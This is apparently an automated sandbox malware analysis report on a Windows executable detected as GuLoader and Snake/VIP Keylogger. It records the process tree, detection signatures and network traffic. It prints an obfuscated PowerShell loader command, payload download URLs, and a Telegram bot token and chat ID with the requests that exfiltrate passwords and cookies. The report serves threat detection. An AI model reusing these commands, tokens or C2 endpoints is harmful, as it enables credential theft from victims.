Edit tour

Windows Analysis Report
ugpJX5h56S.exe

Overview

General Information

Sample name:	ugpJX5h56S.exe renamed because original name is a hash value
Original sample name:	cf28af37882fea56145883bee9a128cb31b51c07d449b49e3071499b5f6f70ea.exe
Analysis ID:	1576733
MD5:	d206d2d4cc4961ace139ac7eb8c4f305
SHA1:	72555790ce99624754007f0de9f8757fa4c4f488
SHA256:	cf28af37882fea56145883bee9a128cb31b51c07d449b49e3071499b5f6f70ea
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

ugpJX5h56S.exe (PID: 5460 cmdline: "C:\Users\user\Desktop\ugpJX5h56S.exe" MD5: D206D2D4CC4961ACE139AC7EB8C4F305)

powershell.exe (PID: 428 cmdline: "powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 6220 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM", "Chat_id": "6651300320", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2665491862.000000000A6E1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 6220	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 6220	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6220, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49817

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 428, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)" , CommandLine: "powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ugpJX5h56S.exe", ParentImage: C:\Users\user\Desktop\ugpJX5h56S.exe, ParentProcessId: 5460, ParentProcessName: ugpJX5h56S.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)" , ProcessId: 428, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T13:36:18.850206+0100	2803305	3	Unknown Traffic	192.168.2.5	49851	172.67.177.134	443	TCP
2024-12-17T13:36:31.439645+0100	2803305	3	Unknown Traffic	192.168.2.5	49889	172.67.177.134	443	TCP
2024-12-17T13:36:40.760862+0100	2803305	3	Unknown Traffic	192.168.2.5	49915	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T13:36:14.717820+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49839	132.226.247.73	80	TCP
2024-12-17T13:36:17.233429+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49839	132.226.247.73	80	TCP
2024-12-17T13:36:20.327176+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49857	132.226.247.73	80	TCP
2024-12-17T13:36:23.421020+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49864	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T13:36:06.745483+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49817	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM", "Chat_id": "6651300320", "Version": "4.4"}
Source: msiexec.exe.6220.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: ugpJX5h56S.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.3% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: ugpJX5h56S.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49845 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49921 version: TLS 1.2

Source: ugpJX5h56S.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2651878810.0000000002E56000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2662602628.000000000841D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Core.pdb]B source: powershell.exe, 00000002.00000002.2651878810.0000000002E56000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00C3F45Dh	6_2_00C3F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00C3F45Dh	6_2_00C3F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00C3FC19h	6_2_00C3F961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 269231E0h	6_2_26922DC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692DC51h	6_2_2692D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 26922C19h	6_2_26922968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692E959h	6_2_2692E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692E0A9h	6_2_2692DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_26920673
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692F209h	6_2_2692EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692CF49h	6_2_2692CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 269231E0h	6_2_26922DB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 269231E0h	6_2_26922DC3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692D7F9h	6_2_2692D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692E501h	6_2_2692E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692F661h	6_2_2692F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692EDB1h	6_2_2692EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 26920D0Dh	6_2_26920B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 26921697h	6_2_26920B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692D3A1h	6_2_2692D0F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2692FAB9h	6_2_2692F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_26920853
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_26920040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 269231E0h	6_2_2692310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:632922%0D%0ADate%20and%20Time:%2018/12/2024%20/%2013:54:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20632922%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1ff686aa7ee1Host: api.telegram.orgContent-Length: 582
Source: global traffic	HTTP traffic detected: POST /bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2020b9ee5469Host: api.telegram.orgContent-Length: 1279Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49839 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49864 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49857 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49817 -> 172.217.19.174:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49851 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49889 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49915 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49845 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:632922%0D%0ADate%20and%20Time:%2018/12/2024%20/%2013:54:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20632922%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1ff686aa7ee1Host: api.telegram.orgContent-Length: 582

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 12:36:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C0D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ugpJX5h56S.exe, ugpJX5h56S.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
